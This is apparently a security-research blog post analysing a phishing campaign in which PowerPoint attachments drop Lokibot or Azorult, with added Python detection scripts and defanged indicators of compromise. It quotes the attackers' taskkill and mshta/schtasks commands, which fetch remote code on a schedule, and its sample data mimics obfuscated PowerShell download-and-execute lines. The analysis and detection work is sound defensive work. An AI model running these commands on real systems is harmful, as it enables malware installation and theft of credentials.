PowerPoint Malware References Drake Lyrics to Drop Lokibot & Azorult


A malware campaign using PowerPoint as the infection vector caught our eye after we noticed lyrics from a popular Drake song hidden inside a PowerShell command. Depending on the victim, it dropped either the Lokibot or the Azorult information stealer. The infection chain starts with a simple email, such as the example pictured below.

[Image: example phishing email carrying the PowerPoint attachment]

Heavy Obfuscation

Opening either of the PowerPoint attachments automatically runs a heavily obfuscated Visual Basic script (VBScript).


The script uses the Microsoft HTML Application host (mshta.exe), a signed Microsoft binary that executes HTML Application content outside the browser, to reach out to a Bitly-shortened link (hxxp://j.mp/*) in an attempt to circumvent browser defense controls. It then uses cmd.exe to forcibly terminate Excel and Word if they are running:

"C:\Windows\System32\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe

It then creates a scheduled task that launches mshta against a Pastebin URL every 60 minutes. The paste holds an encoded script, and in our samples the URL the task retrieves determined whether the recipient ultimately received the Lokibot or the Azorult payload:

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 60 /tn (+main+) /tr "mshta hxxp:\\pastebin[.]com\raw\C5qNg3Dr" /F
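The three command lines above (mshta fetching a shortened URL, cmd/taskkill against Office, and schtasks pointing mshta at Pastebin) also make a compact detection use case. The following Python is an added example, not code from the original post or from the campaign: it runs simple rules over constructed Sysmon-style process-creation events. The events, task name and URLs are made up to mirror the chain and are not the campaign's logs or indicators.

```python
import re

# Constructed Sysmon-style process-creation events (not the campaign's logs).
# Events 0-2 mirror the chain PowerPoint -> mshta -> cmd/taskkill and schtasks;
# 3 and 4 are benign look-alikes. URLs and the task name are placeholders.
SAMPLE_EVENTS = [
    {"parent": "POWERPNT.EXE", "image": "mshta.exe",
     "cmdline": "mshta http://j.mp/EXAMPLE"},
    {"parent": "mshta.exe", "image": "cmd.exe",
     "cmdline": '"C:\\Windows\\System32\\cmd.exe" /c taskkill /f /im excel.exe & taskkill /f /im winword.exe'},
    {"parent": "mshta.exe", "image": "schtasks.exe",
     "cmdline": '"C:\\Windows\\System32\\schtasks.exe" /create /sc MINUTE /mo 60 /tn Updater '
                '/tr "mshta http:\\\\pastebin.com\\raw\\EXAMPLE" /F'},
    # Benign: an administrator scheduling a local backup binary.
    {"parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc DAILY /st 02:00 /tn Backup /tr "C:\\Tools\\backup.exe" /F'},
    # Benign: a user killing a hung editor from an interactive shell.
    {"parent": "cmd.exe", "image": "taskkill.exe", "cmdline": "taskkill /f /im notepad.exe"},
]

OFFICE_PROCS = {"powerpnt.exe", "winword.exe", "excel.exe"}
# Script hosts / LOLBins: suspicious as the parent of cmd or taskkill, and as a
# scheduled-task action that takes a URL argument.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe"}
# http(s) URLs, including the backslash form (hxxp:\\...) seen in the task action above.
URL_RE = re.compile(r"https?:(?://|\\\\)\S+", re.IGNORECASE)
TR_RE = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
IM_RE = re.compile(r"/im\s+(\S+)", re.IGNORECASE)


def task_action(cmdline):
    """Return the /tr action of a schtasks command line (quotes stripped), or None."""
    m = TR_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def _basename(token):
    """Lower-case file name of a path-like token; bare 'mshta' becomes 'mshta.exe'."""
    name = token.strip('"').lower().rsplit("\\", 1)[-1]
    return name if name.endswith(".exe") else name + ".exe"


def analyze_event(ev):
    """Return the list of findings for one process-creation event (empty if nothing fired)."""
    image, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    findings = []

    # 1. mshta pulling remote content, worse when an Office application launched it.
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta fetching remote content")
        if parent in OFFICE_PROCS:
            findings.append(f"mshta spawned by Office process {parent}")

    # 2. Persistence: schtasks /create whose action is a script host pointed at a URL.
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.IGNORECASE):
        action = task_action(cmd) or ""
        parts = action.split()
        if parts and _basename(parts[0]) in SCRIPT_HOSTS and URL_RE.search(action):
            findings.append(f"scheduled task runs {_basename(parts[0])} against a URL")
            if re.search(r"/sc\s+MINUTE\b", cmd, re.IGNORECASE):
                findings.append("task re-fetches on a minute schedule")

    # 3. Cleanup: a script host (directly or through cmd) killing Office processes.
    killed = {t.lower() for t in IM_RE.findall(cmd)}
    if "taskkill" in cmd.lower() and killed & OFFICE_PROCS and parent in SCRIPT_HOSTS:
        hit = ", ".join(sorted(killed & OFFICE_PROCS))
        findings.append(f"{parent} killing Office processes: {hit}")

    return findings


def scan(events):
    """Return (index, findings) for every event that produced at least one finding."""
    return [(i, f) for i, ev in enumerate(events) if (f := analyze_event(ev))]


if __name__ == "__main__":
    for i, f in scan(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["image"], "->", "; ".join(f))
```

Rule 3 deliberately keys on the parent being a script host rather than on taskkill alone, so an administrator closing Office from an interactive shell is not flagged; the parent/child relationship, not the command itself, is what separates this chain from noise.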


Once decoded, this is a PowerShell script that quotes Drake's "Kiki, do you love me" lyric (from "In My Feelings"). The attacker, "Master X" (the author name recovered from the PowerPoint metadata), had a sense of humor when building the Invoke-Expression cmdlet. "Master X" also obfuscated the 'DownloadString' method name inside this PowerShell script, another attempt to evade defenses that monitor PowerShell activity.

[Image: decoded PowerShell script with the "Keke Do You Love Me" lyric and the obfuscated DownloadString call]

This script reaches out to paste.ee and downloads a malicious executable, which it names calc.exe. The file header of the retrieved executable is visible when the paste.ee page is loaded.
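The post does not show how 'DownloadString' was hidden, so the following added example (ours, not the original post's or the attacker's script) assumes the common tricks: an -EncodedCommand blob, backtick-split tokens such as I`E`X, and quoted-string concatenation. It normalizes a PowerShell command line before looking for the method and cmdlet names a monitor that only pattern-matches the raw text would miss. The sample command lines and URLs are constructed placeholders.

```python
import base64
import re

# Constructed PowerShell command lines (not the campaign's script). The obfuscation
# forms below are assumed common techniques; URLs are placeholders.
SAMPLE_SPLIT = (
    'powershell -w hidden -c "$w=New-Object Net.WebClient; '
    "$d='Down'+'load'+'Str'+'ing'; I`E`X ($w.$d('http://paste.ee/r/EXAMPLE'))\""
)
_PLAIN = '(New-Object Net.WebClient).("Downlo"+"adString")(\'http://paste.ee/r/EXAMPLE\')|IEX'
# -EncodedCommand takes the base64 of the UTF-16LE script text.
SAMPLE_ENCODED = "powershell -nop -enc " + base64.b64encode(_PLAIN.encode("utf-16le")).decode()
SAMPLE_BENIGN = 'powershell -c "Get-ChildItem C:\\Windows\\Temp | Measure-Object"'

SUSPICIOUS = ["downloadstring", "downloadfile", "invoke-expression", "iex",
              "net.webclient", "frombase64string"]

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob (PowerShell
# accepts unambiguous prefixes of the parameter name).
ENC_RE = re.compile(r"-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Backticks that merely split a token (I`E`X). Real escapes such as `n, `t, `0 are kept.
BACKTICK_RE = re.compile(r"`(?![ntr0abfv])")
# 'a' + 'b' (either quote style) -> 'ab'
CONCAT_RE = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def decode_encoded_command(cmdline):
    """Replace an -EncodedCommand argument with the decoded UTF-16LE script."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[:m.start()] + decoded + cmdline[m.end():]


def normalize(cmdline):
    """Undo encoding, backtick splitting and quoted-string concatenation."""
    s = decode_encoded_command(cmdline)
    s = BACKTICK_RE.sub("", s)
    prev = None
    while prev != s:  # repeat until no adjacent literals remain ('a'+'b'+'c')
        prev = s
        s = CONCAT_RE.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", s)
    return s


def suspicious_tokens(cmdline):
    """Sorted SUSPICIOUS tokens present in the normalized, lower-cased command line."""
    low = normalize(cmdline).lower()
    return sorted(t for t in SUSPICIOUS
                  if re.search(r"(?<![\w-])" + re.escape(t) + r"(?![\w-])", low))


if __name__ == "__main__":
    for name, sample in [("split", SAMPLE_SPLIT), ("encoded", SAMPLE_ENCODED), ("benign", SAMPLE_BENIGN)]:
        print(name, suspicious_tokens(sample))
```

Normalizing first and matching second is the point: the raw SAMPLE_SPLIT line never contains the substring "DownloadString" or "IEX". The normalizer is intentionally narrow; char-array joins, -f format strings and [char] arithmetic are further layers an obfuscator can add, which is why script-block logging of the de-obfuscated code at execution time remains the stronger control.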


Sanitized Indicators of Compromise:

Lokibot sample:

Dropped executable file
    sha256  80c10ee5f21f92f89cbc293a59d2fd4c01c7958aacad15642558db700943fa22
    path    C:\Users\admin\AppData\Roaming\F63AAA\A71D80.exe

DNS requests
    domain  d228z91au11ukj.cloudfront[.]net
    domain  xnasxjnasn.blogspot[.]com
    domain  paste[.]ee
    domain  j[.]mp

Connections
    ip      143.204.214.11
    ip      104.20.68.143
    ip      107.175.150.73

HTTP/HTTPS requests
    url     hxxp://j[.]mp/mo7xasnnr
    url     hxxp://107.175.150[.]73/~giftioz/.cttr/fre.php
    url     hxxp://pastebin[.]com/raw/CNtXYPpn

Azorult sample:

Main object - "Purchase Order A6.pps"
    sha256  a3c8f58fd18e564ec11c247aede37b0be763d1fca46d0cbe5d032cf17e3a6bf3

DNS requests
    domain  j[.]mp
    domain  xnasxjnasn.blogspot[.]com
    domain  resources.blogblog[.]com
    domain  paste[.]ee

Connections
    ip      104.20.68.143
    ip      23.106.160.1

HTTP/HTTPS requests
    url     hxxp://j[.]mp/ml2xasnnr
    url     hxxp://pastebin[.]com/raw/C5qNg3Dr
    url     hxxp://paste[.]ee/r/sFV9L
    url     hxxp://23.106.160[.]1/Panel/2/index.php
